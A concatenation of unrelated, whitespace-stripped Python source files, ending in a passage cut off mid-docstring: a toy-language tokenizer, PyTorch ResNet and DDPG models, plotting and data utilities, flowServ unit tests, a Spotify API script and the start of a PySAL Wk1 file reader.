from storm.checks import Checker
from storm.collection import OPERATORS, OPERATOR_PRIORITY_ORDER, PREFIXES
from storm.tokens import *
from storm.utils import Paginator, strip, extend
def tokenize(string: str) -> list[Token]:
return Tokenizer(string).parse()
class Tokenizer(Checker, Paginator):
def __init__(self, sequence: str) -> None:
self.tokens: list[Token] = []
super().__init__(sequence)
def parse(self) -> list[Token]:
while self.not_reached_end:
token = self.get_token()
if token:
extend(self.tokens, token)
self.move_to_next_non_empty()
self.final_parse()
return self.tokens
def final_parse(self) -> None:
self.combine_prefix()
self.squash_operators()
self.fix_print()
def combine_prefix(self) -> None:
tokens = Paginator(self.tokens)
while tokens.not_reached_end:
if tokens.obj.type is PrefixType and tokens.next():
tokens.obj = PrefixedToken(tokens.pop(), tokens.obj.value)
tokens.next()
self.tokens = tokens.sequence
def squash_operators(self) -> None:
for operators in OPERATOR_PRIORITY_ORDER:
tokens = Paginator(self.tokens)
while tokens.not_reached_end:
if tokens.obj.type is OperatorType and tokens.obj.value in operators and tokens.next():
tokens.obj = SquashedOperatorToken(roper := tokens.pop(), tokens.pop().value, loper := tokens.obj)
if loper.type in UnOperatable:
for val in tokens.obj.value:
if val not in PREFIXES:
raise SyntaxError(f'Unknown Prefix {val}')
tokens.obj = PrefixedToken(roper, tokens.obj.value)
tokens.sequence.insert(tokens.index, loper)
tokens.next()
elif roper.type is UnOperatable:
raise SyntaxError(f'No roperand {loper.value}{tokens.obj.value}')
tokens.next()
self.tokens = tokens.sequence
def fix_print(self) -> None:
tokens = Paginator(self.tokens)
while tokens.not_reached_end:
if tokens.obj.type is PrintType and tokens.next():
tokens.obj.value = tokens.pop()
tokens.next()
self.tokens = tokens.sequence
def get_token(self) -> Collection[Token] | Token | None:
if self.int_check():
return self.parse_number()
elif self.char_check():
return self.parse_variable()
elif self.print_check():
return self.parse_print()
elif self.base_operator_check():
return self.parse_operator()
elif self.prefix_check():
return self.parse_prefix()
elif self.string_check():
return self.parse_string()
elif self.line_break_check():
return self.break_line()
self.goto_next_non_empty()
def break_line(self) -> Token:
self.goto_next_non_empty()
return Token(LineBreak, ';')
def parse_number(self) -> Token:
value = ''
checks = [self.int_check, self.period_check]
def check_decimal() -> bool:
for pos, check in enumerate(checks):
if check():
if pos > 0:
checks.pop(pos)
return True
return False
while check_decimal():
value += self.obj
self.goto_next_non_empty()
return Token(NumberType, value)
def parse_variable(self) -> Token:
value = ''
while self.char_check():
value += self.obj
self.goto_next_non_empty()
return Token(VariableType, value)
def parse_operator(self) -> Collection[Token] | Token:
value = ''
while self.base_operator_check():
value += self.obj
if value not in OPERATORS:
value = value[:-1]
break
self.goto_next_non_empty()
res = [Token(OperatorType, value), self.parse_prefix()]
return strip(res, '')
def parse_prefix(self) -> Token | str:
value = ''
while self.prefix_check():
value += self.obj
self.goto_next_non_empty()
return value and Token(PrefixType, value)
def parse_string(self) -> Token:
value = ''
starting_paren = self.obj
while self.not_reached_end:
self.next()
value += self.obj
if self.obj == starting_paren:
self.goto_next_non_empty()
if self.string_check():
value += self.parse_string().value
return Token(StringType, value[:-1])
else:
raise SyntaxError("Unclosed string")
def parse_print(self) -> Token:
self.goto_next_non_empty(2)
return Token(PrintType, None)
|
import torch
import torch.nn.functional as F
from torch import nn
def custom_init_fun(m):
if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.fill_(0)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0.0, 0.1)
if m.bias is not None:
m.bias.data.fill_(0)
class FCNet(nn.Module):
def __init__(self, image_size, channels, num_layers, layer_size, classes):
super().__init__()
assert image_size > 1
assert channels >= 1
assert num_layers > 1
assert layer_size > 1
assert classes > 1
self.image_size = image_size
self.channels = channels
self.num_layers = num_layers
self.layer_size = layer_size
self.classes = classes
self.layers = nn.ModuleList()
# first layer
self.layers.append(nn.Linear(self.image_size ** 2 * self.channels, self.layer_size))
num_layers -= 1
# remaining layers
for i in range(num_layers):
self.layers.append(nn.Linear(self.layer_size, self.layer_size))
self.layers.append(nn.Linear(self.layer_size, self.classes))
def forward(self, x):
x = x.view(x.size(0), -1)
for fc_layer in self.layers:
x = torch.relu(fc_layer(x))
return x
class DCNet(nn.Module):
def __init__(self, image_size, channels, num_layers, num_filters, kernel_size, classes, batchnorm=True):
super().__init__()
assert image_size > 1
assert channels >= 1
assert classes > 1
assert num_layers >= 1
self.image_size = image_size
self.channels = channels
self.num_layers = num_layers
self.kernel_size = kernel_size
self.num_filters = num_filters
self.classes = classes
self.batchnorm = batchnorm
self.layers = nn.ModuleList()
if self.batchnorm:
self.bn_layers = nn.ModuleList()
# assume, for simplicity, that we only use 'same' padding and stride 1
padding = (self.kernel_size - 1) // 2
c_in = self.channels
c_out = self.num_filters
for layer in range(self.num_layers):
self.layers.append(nn.Conv2d(c_in, c_out, kernel_size=self.kernel_size, stride=1, padding=padding))
c_in, c_out = c_out, c_out
# c_in, c_out = c_out, c_out + self.filters_inc
if self.batchnorm:
self.bn_layers.append(nn.BatchNorm2d(c_out))
self.layers.append(nn.Linear(c_out, self.classes))
def forward(self, x):
for i, layer in enumerate(self.layers[:-1]):
x = torch.relu(layer(x))
if self.batchnorm:
x = self.bn_layers[i](x)
x_transformed = nn.functional.max_pool2d(x, (x.size(2), x.size(3))).view(x.size(0), -1)
last_activations = self.layers[-1](x_transformed)
return last_activations
class LambdaLayer(nn.Module):
def __init__(self, lambd):
super(LambdaLayer, self).__init__()
self.lambd = lambd
def forward(self, x):
return self.lambd(x)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1, option='A'):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != planes:
if option == 'A':
"""
For CIFAR10 ResNet paper uses option A.
"""
self.shortcut = LambdaLayer(lambda x: F.pad(x[:, :, ::2, ::2],
(0, 0, 0, 0, planes // 4, planes // 4), "constant", 0))
elif option == 'B':
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes))
def forward(self, x):
out = torch.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = torch.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion * planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes))
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10):
super(ResNet, self).__init__()
self.classes = num_classes
self.planes = [16, 32, 64]
self.strides = [1, 2, 2]
self.current_planes = 16
# self.current_size = 32
self.conv1 = nn.Conv2d(3, self.current_planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(self.current_planes)
self.group1 = self._make_layer(block, self.planes[0], num_blocks=num_blocks[0], stride=self.strides[0])
self.group2 = self._make_layer(block, self.planes[1], num_blocks=num_blocks[1], stride=self.strides[1])
self.group3 = self._make_layer(block, self.planes[2], num_blocks=num_blocks[2], stride=self.strides[2])
self.linear = nn.Linear(self.planes[2], num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.current_planes, planes * block.expansion, stride))
self.current_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
x = torch.relu(self.bn1(self.conv1(x)))
x = self.group1(x)
x = self.group2(x)
x = self.group3(x)
x = F.avg_pool2d(x, x.size(3))
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def ResNet56():
return ResNet(BasicBlock, [9, 9, 9])
def ResNet110():
return ResNet(BasicBlock, [18, 18, 18])
def ResNet50():
return ResNet(Bottleneck, [3, 4, 6, 3])
def ResNet101():
return ResNet(Bottleneck, [3, 4, 23, 3])
def ResNet152():
return ResNet(Bottleneck, [3, 8, 36, 3])
|
if __name__ == '__main__':
N = int(input())
mylist = []
for _ in range (0,N):
values = input().split()
if values[0] == "insert":
mylist.insert(int(values[1]),int(values[2]))
elif values[0] == "print":
print (mylist)
elif values[0] == "remove":
mylist.remove(int(values[1]))
elif values[0] == "append":
mylist.append(int(values[1]))
elif values[0] == "sort":
mylist.sort()
elif values[0] == "pop":
mylist.pop()
elif values[0] == "reverse":
mylist.reverse()
#https://www.hackerrank.com/challenges/python-lists/problem |
import inception_v3
def save_proto(proto, prototxt):
with open(prototxt, 'w') as f:
f.write(str(proto))
if __name__ == '__main__':
model = inception_v3.InceptionV3('imagenet_test_lmdb', 'imagenet_train_lmdb', 1000)
train_proto = model.inception_v3_proto(64)
test_proto = model.inception_v3_proto(64, phase='TEST')
save_proto(train_proto, 'imagenet_train.prototxt')
save_proto(test_proto, 'imagenet_test.prototxt')
|
import sys
import torch
import torch.nn as nn
from torch.optim import Adam
from torch.autograd import Variable
import torch.nn.functional as F
def soft_update(target, source, tau):
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
def hard_update(target, source):
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
"""
From: https://github.com/pytorch/pytorch/issues/1959
There's an official LayerNorm implementation in pytorch now, but it hasn't been included in
pip version yet. This is a temporary version
This slows down training by a bit
"""
class LayerNorm(nn.Module):
def __init__(self, num_features, eps=1e-5, affine=True):
super(LayerNorm, self).__init__()
self.num_features = num_features
self.affine = affine
self.eps = eps
if self.affine:
self.gamma = nn.Parameter(torch.Tensor(num_features).uniform_())
self.beta = nn.Parameter(torch.zeros(num_features))
def forward(self, x):
shape = [-1] + [1] * (x.dim() - 1)
mean = x.view(x.size(0), -1).mean(1).view(*shape)
std = x.view(x.size(0), -1).std(1).view(*shape)
y = (x - mean) / (std + self.eps)
if self.affine:
shape = [1, -1] + [1] * (x.dim() - 2)
y = self.gamma.view(*shape) * y + self.beta.view(*shape)
return y
nn.LayerNorm = LayerNorm
class Actor(nn.Module):
def __init__(self, hidden_size, num_inputs, action_space, discrete, no_ln):
super(Actor, self).__init__()
self.no_ln = no_ln
self.discrete = discrete
self.action_space = action_space
if self.discrete:
num_outputs = action_space.n
else:
num_outputs = action_space.shape[0]
self.linear1 = nn.Linear(num_inputs, hidden_size)
self.ln1 = nn.LayerNorm(hidden_size)
self.linear2 = nn.Linear(hidden_size, hidden_size)
self.ln2 = nn.LayerNorm(hidden_size)
self.mu = nn.Linear(hidden_size, num_outputs)
self.mu.weight.data.mul_(0.1)
self.mu.bias.data.mul_(0.1)
def forward(self, inputs):
x = inputs
x = self.linear1(x)
if not self.no_ln:
x = self.ln1(x)
x = F.relu(x)
x = self.linear2(x)
if not self.no_ln:
x = self.ln2(x)
x = F.relu(x)
if self.discrete:
mu = F.softmax(self.mu(x), dim=1)
else:
mu = F.tanh(self.mu(x))
return mu
class Critic(nn.Module):
def __init__(self, hidden_size, num_inputs, action_space, discrete, no_ln):
super(Critic, self).__init__()
self.no_ln = no_ln
self.action_space = action_space
self.discrete = discrete
if self.discrete:
num_outputs = action_space.n
else:
num_outputs = action_space.shape[0]
self.linear1 = nn.Linear(num_inputs, hidden_size)
self.ln1 = nn.LayerNorm(hidden_size)
self.linear2 = nn.Linear(hidden_size+num_outputs, hidden_size)
self.ln2 = nn.LayerNorm(hidden_size)
self.V = nn.Linear(hidden_size, 1)
self.V.weight.data.mul_(0.1)
self.V.bias.data.mul_(0.1)
def forward(self, inputs, actions):
x = inputs
x = self.linear1(x)
if not self.no_ln:
x = self.ln1(x)
x = F.relu(x)
x = torch.cat((x, actions), 1)
x = self.linear2(x)
if not self.no_ln:
x = self.ln2(x)
x = F.relu(x)
V = self.V(x)
return V
class DDPG(object):
def __init__(self, gamma, tau, hidden_size, num_inputs, action_space, discrete, lr, args):
self.args = args
self.num_inputs = num_inputs
self.action_space = action_space
self.discrete = discrete
self.device = torch.device('cuda')
self.actor = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
self.actor_target = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
self.actor_perturbed = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
self.actor_optim = Adam(self.actor.parameters(), lr=lr[0])
self.critic = Critic(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
self.critic_target = Critic(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
self.critic_optim = Adam(self.critic.parameters(), lr=lr[1])
self.gamma = gamma
self.tau = tau
hard_update(self.actor_target, self.actor) # Make sure target is with the same weight
hard_update(self.critic_target, self.critic)
def select_action(self, state, action_noise=None, param_noise=None, explore=True):
self.actor.eval()
if param_noise is not None:
mu = self.actor_perturbed((Variable(state)))
else:
mu = self.actor((Variable(state)))
self.actor.train()
mu = mu.data
if action_noise is not None:
mu += torch.Tensor(action_noise.noise())
if self.discrete:
entropy = -(torch.log(mu) * mu).sum(1).mean()
if explore:
return mu.multinomial(1), mu, entropy
else:
return mu.max(1, keepdim=True)[1], mu, entropy
else:
return mu.clamp(-1, 1), None, None
def update_parameters(self, batch):
state_batch = torch.stack(batch.state, dim=0)
action_batch = torch.stack(batch.action, dim=0)
reward_batch = torch.stack(batch.reward, dim=0)
mask_batch = torch.stack(batch.mask, dim=0)
next_state_batch = torch.stack(batch.next_state, dim=0)
next_action_batch = self.actor_target(next_state_batch)
next_state_action_values = self.critic_target(next_state_batch, next_action_batch)
#reward_batch = reward_batch.unsqueeze(1)
#mask_batch = mask_batch.unsqueeze(1)
expected_state_action_batch = reward_batch + (self.gamma * mask_batch * next_state_action_values)
self.critic_optim.zero_grad()
state_action_batch = self.critic((state_batch), (action_batch))
value_loss = F.mse_loss(state_action_batch, expected_state_action_batch)
value_loss.backward()
self.critic_optim.step()
self.actor_optim.zero_grad()
policy_loss = -self.critic((state_batch),self.actor((state_batch)))
policy_loss = policy_loss.mean()
policy_loss.backward()
self.actor_optim.step()
soft_update(self.actor_target, self.actor, self.tau)
soft_update(self.critic_target, self.critic, self.tau)
return value_loss.item(), policy_loss.item()
def perturb_actor_parameters(self, param_noise):
"""Apply parameter noise to actor model, for exploration"""
hard_update(self.actor_perturbed, self.actor)
params = self.actor_perturbed.state_dict()
for name in params:
if 'ln' in name:
pass
param = params[name]
param += torch.randn(param.shape) * param_noise.current_stddev
def save_model(self, env_name, suffix="", actor_path=None, critic_path=None):
if not os.path.exists('models/'):
os.makedirs('models/')
if actor_path is None:
actor_path = "models/ddpg_actor_{}_{}".format(env_name, suffix)
if critic_path is None:
critic_path = "models/ddpg_critic_{}_{}".format(env_name, suffix)
print('Saving models to {} and {}'.format(actor_path, critic_path))
torch.save(self.actor.state_dict(), actor_path)
torch.save(self.critic.state_dict(), critic_path)
def load_model(self, actor_path, critic_path):
print('Loading models from {} and {}'.format(actor_path, critic_path))
if actor_path is not None:
self.actor.load_state_dict(torch.load(actor_path))
if critic_path is not None:
self.critic.load_state_dict(torch.load(critic_path)) |
'''
Venn diagram plotting routines.
Utility routines
Copyright 2012, Konstantin Tretyakov.
http://kt.era.ee/
Licensed under MIT license.
'''
from matplotlib_venn._venn2 import venn2, compute_venn2_subsets
from matplotlib_venn._venn3 import venn3, compute_venn3_subsets
def venn2_unweighted(subsets, set_labels=('A', 'B'), set_colors=('r', 'g'), alpha=0.4, normalize_to=1.0, subset_areas=(1, 1, 1), ax=None):
'''
The version of venn2 without area-weighting.
It is implemented as a wrapper around venn2. Namely, venn2 is invoked as usual, but with all subset areas
set to 1. The subset labels are then replaced in the resulting diagram with the provided subset sizes.
The parameters are all the same as that of venn2.
In addition there is a subset_areas parameter, which specifies the actual subset areas.
(it is (1, 1, 1) by default. You are free to change it, within reason).
'''
v = venn2(subset_areas, set_labels, set_colors, alpha, normalize_to, ax)
# Now rename the labels
subset_ids = ['10', '01', '11']
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in subset_ids]
elif len(subsets) == 2:
subsets = compute_venn2_subsets(*subsets)
for n, id in enumerate(subset_ids):
lbl = v.get_label_by_id(id)
if lbl is not None:
lbl.set_text(str(subsets[n]))
return v
def venn3_unweighted(subsets, set_labels=('A', 'B', 'C'), set_colors=('r', 'g', 'b'), alpha=0.4, normalize_to=1.0, subset_areas=(1, 1, 1, 1, 1, 1, 1), ax=None):
'''
The version of venn3 without area-weighting.
It is implemented as a wrapper around venn3. Namely, venn3 is invoked as usual, but with all subset areas
set to 1. The subset labels are then replaced in the resulting diagram with the provided subset sizes.
The parameters are all the same as that of venn2.
In addition there is a subset_areas parameter, which specifies the actual subset areas.
(it is (1, 1, 1, 1, 1, 1, 1) by default. You are free to change it, within reason).
'''
v = venn3(subset_areas, set_labels, set_colors, alpha, normalize_to, ax)
# Now rename the labels
subset_ids = ['100', '010', '110', '001', '101', '011', '111']
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in subset_ids]
elif len(subsets) == 3:
subsets = compute_venn3_subsets(*subsets)
for n, id in enumerate(subset_ids):
lbl = v.get_label_by_id(id)
if lbl is not None:
lbl.set_text(str(subsets[n]))
return v |
import numpy as np
import pickle
import gzip
import h5py
def save_zipped_pickle(obj, filename, protocol=-1):
with gzip.open(filename, 'wb') as f:
pickle.dump(obj, f, protocol)
def load_zipped_pickle(filename):
with gzip.open(filename, 'rb') as f:
loaded_object = pickle.load(f)
return loaded_object
def save_to_hdf5_file(datasets:dict, file_name:str, compression=None):
h = h5py.File(file_name, 'w')
for k, v in datasets.items():
h.create_dataset(k, data=v, compression=compression)
h.flush()
h.close()
def read_from_hdf5_file(file_name:str, ds_name:str):
h = h5py.File(file_name, 'r')
return h[ds_name]
def create_record(element_type, value=None):
if value is None:
return np.rec.array(np.zeros((1), dtype=element_type)[0], dtype=element_type)
else:
return np.rec.array(value, dtype=element_type)
|
# This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for file parameter declarations."""
from pathlib import Path
import os
import pytest
from flowserv.volume.fs import FSFile
from flowserv.model.parameter.files import InputDirectory, InputFile, File, PARA_FILE
from flowserv.volume.fs import FileSystemStorage
import flowserv.error as err
def test_invalid_serialization():
"""Test errors for invalid serializations."""
File.from_dict({
'name': '0000',
'dtype': PARA_FILE,
'index': 0,
'label': 'Input file',
'isRequired': True,
'targetPath': 'data/names.txt'
}, validate=False)
with pytest.raises(err.InvalidParameterError):
File.from_dict({
'name': '0000',
'dtype': PARA_FILE,
'index': 0,
'label': 'Input file',
'isRequired': True,
'targetPath': 'data/names.txt'
})
with pytest.raises(ValueError):
File.from_dict({
'name': '0000',
'dtype': 'string',
'index': 0,
'label': 'Name',
'isRequired': True,
'target': 'data/names.txt'
})
def test_file_parameter_from_dict():
"""Test generating a file parameter declaration from a dictionary
serialization.
"""
para = File.from_dict(
File.to_dict(
File.from_dict({
'name': '0000',
'dtype': PARA_FILE,
'label': 'Names',
'index': 2,
'help': 'List of names',
'defaultValue': 'data/default_names.txt',
'isRequired': False,
'group': 'inputs',
'target': 'data/names.txt'
})
)
)
assert para.is_file()
assert para.name == '0000'
assert para.dtype == PARA_FILE
assert para.label == 'Names'
assert para.index == 2
assert para.help == 'List of names'
assert para.default == 'data/default_names.txt'
assert not para.required
assert para.group == 'inputs'
assert para.target == 'data/names.txt'
def test_parameter_value_dir(tmpdir):
"""Test directories as input parameter values."""
basedir = os.path.join(tmpdir, 's1')
os.makedirs(basedir)
f1 = os.path.join(basedir, 'file.txt')
Path(f1).touch()
f2 = os.path.join(basedir, 'data.json')
Path(f2).touch()
dir = InputDirectory(
store=FileSystemStorage(basedir=basedir),
source=None,
target='runs'
)
assert str(dir) == 'runs'
target = FileSystemStorage(basedir=os.path.join(tmpdir, 's2'))
assert set(dir.copy(target=target)) == {'runs/file.txt', 'runs/data.json'}
assert os.path.isfile(os.path.join(tmpdir, 's2', 'runs', 'file.txt'))
assert os.path.isfile(os.path.join(tmpdir, 's2', 'runs', 'data.json'))
def test_parameter_value_file(tmpdir):
"""Test getting argument value for a file parameter."""
filename = os.path.join(tmpdir, 'file.txt')
Path(filename).touch()
# -- Parameter target value
para = File('0000', 0, target='data/names.txt')
file = para.cast(FSFile(filename))
assert isinstance(file, InputFile)
assert str(file) == 'data/names.txt'
assert file.copy(target=FileSystemStorage(basedir=os.path.join(tmpdir, 's1'))) == ['data/names.txt']
# -- Parameter default value
para = File('0000', 0, default='data/names.txt')
file = para.cast(FSFile(filename))
assert str(file) == 'data/names.txt'
# -- Error for missing target
para = File('0000', 0)
with pytest.raises(err.InvalidArgumentError):
para.cast(filename)
# -- Missing file without error
para = File('0000', 0, target='data/names.txt')
filename = os.path.join(filename, 'missing.txt')
file = para.cast(FSFile(filename, raise_error=False))
assert str(file) == 'data/names.txt'
|
#!/usr/bin/env python
import configparser
import os
import spotipy
import json
import sys
import logging
from etlutils.datafiles import get_monthly_file_path
# string constant
NOT_SET_VALUE = 'NOT SET'
config_parser = configparser.ConfigParser()
config_parser.read('config.ini')
client_id = config_parser.get('Login Parameters', 'client_id', fallback=NOT_SET_VALUE)
client_secret = config_parser.get('Login Parameters', 'client_secret', fallback=NOT_SET_VALUE)
access_token = config_parser.get('Login Parameters', 'access_token', fallback=NOT_SET_VALUE)
logging_level = config_parser.get('logging', 'logging_level', fallback=logging.INFO)
logging_file = config_parser.get('logging', 'logging_file', fallback=None)
if os.environ.get("SPOTIPY_CLIENT_ID", NOT_SET_VALUE) is NOT_SET_VALUE:
if client_id is NOT_SET_VALUE:
print('ERROR: Environment variable is not set and client id not read from config file')
sys.exit(1)
os.environ['SPOTIPY_CLIENT_ID'] = client_id
if os.environ.get("SPOTIPY_CLIENT_SECRET", NOT_SET_VALUE) is NOT_SET_VALUE:
if client_secret is NOT_SET_VALUE:
print('ERROR: Environment variable is not set and client secret not read from config file')
sys.exit(1)
os.environ['SPOTIPY_CLIENT_SECRET'] = client_secret
logger = logging.getLogger('get_track_info')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(name)s - %(asctime)s (%(levelname)s): %(message)s')
formatter.datefmt = '%Y-%m-%d %H:%M:%S %z'
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(formatter)
logger.addHandler(ch)
if logging_file:
fh = logging.FileHandler(logging_file)
fh.setLevel(logging_level)
fh.setFormatter(formatter)
logger.addHandler(fh)
token = spotipy.util.prompt_for_user_token('intonarumori', 'user-library-read user-read-recently-played playlist-read-private playlist-read-collaborative user-top-read', client_id, client_secret, redirect_uri='https://127.0.0.1:8080')
sp = spotipy.Spotify(auth=token)
id = "5ObtaYq6nPnKliDjfMFjAI"
info = sp.track(id)
analysis = sp.audio_analysis(id)
features = sp.audio_features(tracks=[id])
tracks_info = dict()
tracks_info[id] = {
"info": info,
"analysis": analysis,
"features": features,
"plays": []
}
with open("tracks.json", 'w') as f:
f.write(json.dumps(tracks_info))
|
from collections import defaultdict
onehot_dict = {'A': 0, 'C': 1, 'D': 2, 'E': 3, 'F': 4, 'G': 5, 'H': 6, 'I': 7, 'K': 8, 'L': 9, 'M': 10,
'N': 11, 'P': 12, 'Q': 13, 'R': 14, 'S': 15, 'T': 16, 'V': 17, 'W': 18, 'Y': 19,'-':20}
onehot_dict = defaultdict(lambda: onehot_dict['-'], onehot_dict)
onehot_dict_inv= {v:k for k,v in onehot_dict.items()}
aa_dict = {'ALA': 'A', 'ARG': 'R', 'ASN': 'N', 'ASP': 'D', 'CYS': 'C', 'GLU': 'E',
'GLN': 'Q', 'GLY': 'G', 'HIS': 'H', 'ILE': 'I', 'LEU': 'L', 'LYS': 'K',
'MET': 'M', 'PHE': 'F', 'PRO': 'P', 'SER': 'S', 'THR': 'T', 'TRP': 'W',
'TYR': 'Y', 'VAL': 'V', 'HSE': 'H', 'HSD': 'H', 'UNK': 'X'}
aa_dict_inv = {v:k for k,v in aa_dict.items()}
|
import struct
from .. import fileio
from ...weights import W
__author__ = "Myunghwa Hwang <mhwang4@gmail.com>"
__all__ = ["Wk1IO"]
class Wk1IO(fileio.FileIO):
"""
MATLAB wk1read.m and wk1write.m that were written by Brian M. Bourgault in 10/22/93
Opens, reads, and writes weights file objects in Lotus Wk1 format.
Lotus Wk1 file is used in Dr. LeSage's MATLAB Econometrics library.
A Wk1 file holds a spatial weights object in a full matrix form
without any row and column headers.
The maximum number of columns supported in a Wk1 file is 256.
Wk1 starts the row (column) number from 0 and
uses little endian binary endcoding.
In PySAL, when the number of observations is n,
it is assumed that each cell of a n\*n(=m) matrix either is a blank or
have a number.
The internal structure of a Wk1 file written by PySAL is as follows:
[BOF][DIM][CPI][CAL][CMODE][CORD][SPLIT][SYNC][CURS][WIN]
[HCOL][MRG][LBL][CELL_1]...[CELL_m][EOF]
where [CELL_k] equals to [DTYPE][DLEN][DFORMAT][CINDEX][CVALUE].
The parts between [BOF] and [CELL_1] are variable according to the software
program used to write a wk1 file. While reading a wk1 file,
PySAL ignores them.
Each part of this structure is detailed below.
.. table:: Lotus WK1 fields
+-------------+---------------------+-------------------------+-------+-----------------------------+
|Part |Description |Data Type |Length |Value |
+=============+=====================+=========================+=======+=============================+
|[BOF] |Begining of field |unsigned character |6 |0,0,2,0,6,4 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[DIM] |Matrix dimension |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [DIMDTYPE] |Type of dim. rec |unsigned short |2 |6 |
| [DIMLEN] |Length of dim. rec |unsigned short |2 |8 |
| [DIMVAL] |Value of dim. rec |unsigned short |8 |0,0,n,n |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CPI] |CPI |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [CPITYPE] |Type of cpi rec |unsigned short |2 |150 |
| [CPILEN] |Length of cpi rec |unsigned short |2 |6 |
| [CPIVAL] |Value of cpi rec |unsigned char |6 |0,0,0,0,0,0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CAL] |calcount |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [CALTYPE] |Type of calcount rec |unsigned short |2 |47 |
| [CALLEN] |Length calcount rec |unsigned short |2 |1 |
| [CALVAL] |Value of calcount rec|unsigned char |1 |0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CMODE] |calmode |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [CMODETYP] |Type of calmode rec |unsigned short |2 |2 |
| [CMODELEN] |Length of calmode rec|unsigned short |2 |1 |
| [CMODEVAL] |Value of calmode rec |signed char |1 |0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CORD] |calorder |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [CORDTYPE] |Type of calorder rec |unsigned short |2 |3 |
| [CORDLEN] |Length calorder rec |unsigned short |2 |1 |
| [CORDVAL] |Value of calorder rec|signed char |1 |0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[SPLIT] |split |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [SPLTYPE] |Type of split rec |unsigned short |2 |4 |
| [SPLLEN] |Length of split rec |unsigned short |2 |1 |
| [SPLVAL] |Value of split rec |signed char |1 |0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[SYNC] |sync |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [SYNCTYP] |Type of sync rec |unsigned short |2 |5 |
| [SYNCLEN] |Length of sync rec |unsigned short |2 |1 |
| [SYNCVAL] |Value of sync rec |singed char |1 |0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CURS] |cursor |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [CURSTYP] |Type of cursor rec |unsigned short |2 |49 |
| [CURSLEN] |Length of cursor rec |unsigned short |2 |1 |
| [CURSVAL] |Value of cursor rec |signed char |1 |1 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[WIN] |window |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [WINTYPE] |Type of window rec |unsigned short |2 |7 |
| [WINLEN] |Length of window rec |unsigned short |2 |32 |
| [WINVAL1] |Value 1 of window rec|unsigned short |4 |0,0 |
| [WINVAL2] |Value 2 of window rec|signed char |2 |113,0 |
| [WINVAL3] |Value 3 of window rec|unsigned short |26 |10,n,n,0,0,0,0,0,0,0,0,72,0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[HCOL] |hidcol |
